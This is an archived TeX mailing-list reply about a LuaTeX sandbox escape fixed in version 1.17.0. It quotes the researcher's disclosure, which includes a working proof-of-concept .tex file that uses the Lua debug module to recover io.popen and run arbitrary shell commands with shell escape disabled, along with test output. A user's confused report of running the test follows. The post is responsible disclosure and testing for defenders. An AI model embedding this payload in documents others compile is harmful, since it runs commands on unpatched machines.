More info about LuaTeX 1.17.0 (security update)

Ken Moffat zarniwhoop at ntlworld.com
Mon May 22 22:59:38 CEST 2023


On Mon, May 22, 2023 at 04:31:27AM -0600, Max Chernoff wrote:
> Hi all,
> 
> A few weeks ago, Luigi and the TeX Live team released LuaTeX 1.17.0. In
> the announcement email, Karl was initially pretty vague:
> 
> > FYI: some issues have been found in luatex (obscure ways to work around
> > some security features; thanks to Max Chernoff).  Luigi has committed
> > fixes to the sources, and we are rebuilding now. The new luatex version
> > is 1.17.0. All four luatex binaries (luatex luahbtex luajitex luajithbtex)
> > are affected.
> 
> Enough time has passed, so I'll share some more details now.
> 
> Through some trickery with the debug module, any document compiled with
> older versions of LuaTeX (1.04--1.16.1) can execute arbitrary shell
> commands, even with shell escape completely disabled. Vulnerable
> versions were included in TeX Live 2017--2023 and MiKTeX 2.9.6300--23.4;
> updated versions of TeX Live 2023 and MiKTeX 23.5 include the fixed
> 1.17.0 version.
> 
> Here's a test document:
> 
>     % shell-escape-test.tex
>     \directlua{
>         local function get_upvalue(func, name)
>             local nups = debug.getinfo(func).nups
> 
>             for i = 1, nups do
>                 local current, value = debug.getupvalue(func, i)
>                 if current == name then
>                     return value
>                 end
>             end
>         end
> 
>         local outer = get_upvalue(io.popen, "popen")
>         local popen = get_upvalue(outer or io.popen, "io_popen")
> 
>         print(popen(arg[rawlen(arg)]):read("*a"))
>     }
>     \csname@@end\endcsname
>     \end
> 
> If you're using a vulnerable version of LuaTeX, then the output will
> look something like this:
> 
>    $ lualatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
>    This is LuaHBTeX, Version 1.16.0 (TeX Live 2023)
>    restricted system commands enabled.
>    (./shell-escape-test.tex
>    LaTeX2e <2022-11-01> patch level 1
>    L3 programming layer <2023-04-20>@@@VULNERABLE@@@
>    [...]
> 
> If you're using a safe/fixed version, then you'll see this:
> 
>    $ luatex shell-escape-test.tex "sh -c 'echo @@@VULNERABLE@@@'"
>    This is LuaTeX, Version 1.17.0 (TeX Live 2023)
>     restricted system commands enabled.
>    (./shell-escape-test.tex[\directlua]:1: attempt to call a nil value (local 'popen')
>    [...]
> 
> This issue affects all operating systems/architectures, and all LuaTeX
> formats except for ConTeXt. Further details are available at:
> 
>    https://tug.org/~mseven/luatex.html
> 
> Feel free to reply if you have any questions.
> 
> Thanks,
> -- Max

Thanks for the details.  Unfortunately, the machine where I
patched the source to hopefully fix this for BLFS has died.
On the machine I'm currently using I've got an original TL2023
binary install, but after pasting the example from
https://tug.org/~mseven/luatex.html I get the following:

en at deluxe /tmp $lualatex shell-escape-test.tex 
This is LuaHBTeX, Version 1.16.0 (TeX Live 2023) 
 restricted system commands enabled.
(./shell-escape-test.tex
LaTeX2e <2022-11-01> patch level 1
 L3 programming layer <2023-02-22>sh: line 1: shell-escape-test.tex: command not found

)
 296 words of node memory still in use:
   1 hlist, 3 kern, 1 glyph, 1 attribute, 39 glue_spec, 1 attribute_list nodes
   avail lists: 2:10,3:3,4:1,5:1

warning  (pdf backend): no pages of output.
Transcript written on shell-escape-test.log.

Not surprising, I do not normally make tex source executable.
But chmod 755 does not help.

Confused.

ĸen
-- 
They feel among themselves that everything that is being done is
bad - even though that everything is done by their own party.
             - Anthony Trollope, 'The Eustace Diamonds'

